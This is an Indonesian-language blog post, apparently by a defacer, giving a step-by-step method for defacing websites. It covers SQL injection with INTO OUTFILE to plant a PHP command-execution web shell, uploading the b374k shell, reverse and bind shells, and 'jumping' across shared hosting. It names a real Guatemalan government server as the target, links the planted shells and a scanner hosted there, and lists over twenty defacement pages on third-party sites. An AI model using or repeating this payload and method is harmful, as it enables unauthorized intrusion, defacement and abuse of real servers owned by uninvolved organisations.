Wah dah lama ga ngeblog
kali ini gw mau share beberapa teknik2(POC) buat ngedeface .
kalo yang sudah pada tau teknik2 ini jangan pada ngina
yah maklum nubie mau coba bikin artikel :p
yang sudah baca yah jangan lupa komen2nya
yah itung2 belajar bareng š
ok mulai aja deh ke tutor
hal yg diperlukan :
- berdoa
- siapin makanan ringan
- dan segelas kopi (java)
- koneksi internet + komputernya š
nah kalo udah pada siap liangsung pergi ke om google untuk melakukan pencarian dengan dork :
kemudian pilih deh web target yang memiliki vulnerability š
setelah masuk ke website targget ubah url nya yg tadinya load_file(‘/etc/passwd’) menjadi
“<?php echo \'<pre>\’;system($_GET[\’cmd\’]);echo \'</pre>\’;?>”
dan diakhir url ditambahkan
+INTO+OUTFILE+”lokasi direktory(folder) yang permisionya 777/namashell.php”/*
setelah berhasil membuat shell dari sql injection sebaiknya di coba terlebih dahulu apakah berhasil
atau tidak dengan menjalankan perintah ls -al pada cmd=
real target : http://www.inacif.gob.gt/design/default/james0bastershell.php?cmd=ls -al
upload deh shell yg lebih familiar buat anda digunakan seperti saya b374k.php š dengan perintah
download sebagai berikut :
dan hasilnya sebagai berikut :
bisa backconnect sama bind, lumayan buat DDOS atau apalah soalnya servernya ga make firewall.
kalo belom bisa ngeroot bisa pake teknik jumping karena di dalemnya ada 21 readable user directory
berikut hasil URL jumpingan dari http://www.inacif.gob.gt/ ke Ā http://www.cinde.com.gt/
URL : http://www.inacif.gob.gt/design/default/b374k.php?y=/home2/cinde/cinde-www/webcontrol/
dan berikut hasil defaceannya š
- http://www.cinde.com.gt/webcontrol/james0baster.html
- http://www.amchamguatebusiness.com/media/Image/Julio_ago/james0baster.html
- http://www.asociacioncambiandovidas.org/media/Image/james0baster.html
- http://sanjuansacatepequez.com.gt/media/Image/james0baster.html
- http://merka.com.gt/media/Image/james0baster.html
- http://difoto.com/media/Image/james0baster.html
- http://web.ecssa.com.gt/media/Image/james0baster.html
- http://dmarie.com.gt/media/Image/james0baster.html
- http://www.horcalsa.com/media/Image/james0baster.html
- http://aplytek.com/media/Image/james0baster.html
- http://www.ffacsa.com/media/Image/james0baster.html
- http://www.palixcan.com/media/Image/james0baster.html
- http://www.rototec.com.gt/media/Image/james0baster.html
- http://www.pinbol.net/media/Image/james0baster.html
- http://www.nisfessa.com/media/Image/james0baster.html
- http://www.fmglobo.com.gt/media/Image/james0baster.html
- http://www.artgala.org/media/Image/james0baster.html
- http://www.cognos.com.gt/media/Image/james0baster.html
- http://www.saluvita.com.gt/media/Image/james0baster.html
- http://www.copredeh.gob.gt/media/Image/james0baster.html
- http://adinmsa.com/media/Image/james0baster.html
- http://elmastil.com/media/Image/james0baster.html
- http://starkids.com.gt/media/Image/james0baster.html
- http://www.inacif.gob.gt/design/default/james0baster.html
dan masih banyak lagi :p
sehubung banyak yg minta script scaner buat tuh web lewat YM oke ane berikan nih
http://www.inacif.gob.gt/design/default/james0basterscaner.php
NB : JANGAN RUSAK WEBNYA KALO MAU DIFACE JANGAN INDEXNYA, DEFACE HIDDEN AJA.
ITU BUAT BELAJAR BARENG2 JANGAN SERAKAH
0 Comments